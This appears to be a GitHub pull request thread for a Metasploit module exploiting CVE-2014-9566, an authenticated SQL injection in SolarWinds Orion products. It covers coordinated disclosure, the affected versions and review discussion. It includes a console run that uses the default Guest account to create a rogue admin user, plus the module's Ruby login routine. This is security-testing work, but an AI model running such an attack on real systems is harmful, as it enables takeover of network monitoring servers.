Solarwinds Core Orion Service SQL injection (CVE-2014-9566)

[brandonprry]

This pull request adds support for exploiting an authenticated stacked SQL injection within the core Orion service of many Solarwinds products, specifically:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

Any user can be used to exploit this, including the default Guest account (which has no password by default, and is the default user in the module). IIRC Tod should have a vulnerable trial.

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of Feb 24th, 2015 was chosen by both parties.

Example run:

bperry@bperry-server:~/tools/brandonprry-metasploit-framework$ ./msfconsole 
[*] Starting the Metasploit Framework console...\

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1405 exploits - 798 auxiliary - 229 post        ]
+ -- --=[ 361 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/gather/solarwinds_orion_sqli 
msf auxiliary(solarwinds_orion_sqli) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf auxiliary(solarwinds_orion_sqli) > show options

Module options (auxiliary/gather/solarwinds_orion_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.105    yes       The target address
   RPORT      8787             yes       The target port
   TARGETURI  /                yes       Base Orion directory path
   USERNAME   Guest            yes       The username to authenticate as
   VHOST                       no        HTTP server virtual host

msf auxiliary(solarwinds_orion_sqli) > run

[*] Logged in as Guest, sending payload to create SlEDesxq admin user.
[+] The injection worked, log in with SlEDesxq and a blank password
[*] Auxiliary module execution completed
msf auxiliary(solarwinds_orion_sqli) > 

[void-in]

@brandonprry Can you provide some clarity here. The login function takes the username and password from datastore and authenticate. By default that is Guest with blank password. However, when the injection is done, you call login(username,'') which will call the method with the injected username and blank password however the login will still use the previous username (guest) and password in the datastore which won't prove anything.

On line 90, I inserted the statement:

datastore['username'] = username

just for demonstration and I got the response:

The module fail to login with the newly created account but in the current state it will still display success since it is using the datastore username and password.

[void-in]

Should be more like

def login (username = datastore['USERNAME'], password = datastore['PASSWORD'])

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx')
    })

    viewstate = $1 if res.body =~ /id="__VIEWSTATE" value="(.*)" \/>/

    cookie = res.get_cookies

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx'),
      'method' => 'POST',
      'vars_post' => {
        '__EVENTTARGET' => '',
        '__EVENTARGUMENT' => '',
        '__VIEWSTATE' => viewstate,
        'ctl00$BodyContent$Username' => username,
        'ctl00$BodyContent$Password' => password
      },
      'cookie' => cookie
    })

    if res.code == 200
      fail_with("Authentication failed with username #{username}")
    end
    return cookie + ';' + res.get_cookies
  end

[brandonprry]

Great catch, fixing now. Originally, the login code lived in run, and was moved out. Missed updating this part.

[wchen-r7]

I have NPM 11.5 but this doesn't seem to work for me.

Last commit of the branch I tested:

$ git log -1
commit ceb92cdf5e581f48e5b893e7557911bb2799d9a0
Author: Brandon Perry <bperry.volatile@gmail.com>
Date:   Thu Feb 26 07:33:51 2015 -0600

    update login method

[brandonprry]

11.5 is the latest version and is patched. Versions prior to 11.5 are vulnerable.

[brandonprry]

I currently have vulnerable versions of the following if needed:

SolarWinds-NCM-v7
SolarWinds-NPM-v11
SolarWinds-SAM-v6
SolarWinds-VNQM-v4

[wchen-r7]

I'm sure this module works, do you mind just e-mailing a pcap instead? msfdev[at]metasploit.com

The code looks good except I would probably do a res.nil? check for send_request_cgi. I was just gonna fix that myself and land it.

[brandonprry]

I can, will have to be tomorrow though. :) Will also add the nil check.

[wchen-r7]

Thank you.

[brandonprry]

Sent.

[void-in]

Seems like NPM 10.7 is not vulnerable as well.

[brandonprry]

Hmm, it may be that the SQL schema for the user table isn't the same in 10.7 as in 11.4, which is what I have been testing against for NPM.

If you could get me an installer for 10.7, I wouldn't mind taking a look at the schema to verify.

[wchen-r7]

I have received the pcap so I am ready to land this. If you would like this to be landed now, I can do it. If you prefer to wait a little bit longer to double check on 10.7, I can do that too. Please let me know. Thanks.

[brandonprry]

I am OK with merging it in the current state. I tested with the versions prior to the latest available that I posted above, but can make an updated PR if I can get a hold of 10.7.

[void-in]

@brandonprry I will take a look at it in a day or two (actually out of office for a few days) and send you the required setup file.

[wchen-r7]

I am OK with merging it in the current state. I tested with the versions prior to the latest available that I posted above, but can make an updated PR if I can get a hold of 10.7.

Ok, then I will merge it today. Thanks.

[brandonprry]

Thanks a bunch dude!

@void-in, feel free to hit me up on IRC if you can get the installer.

On Mon, Mar 2, 2015 at 11:45 AM, sinn3r notifications@github.com wrote:

Merged #4836 #4836.

—
Reply to this email directly or view it on GitHub
#4836 (comment)
.

http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website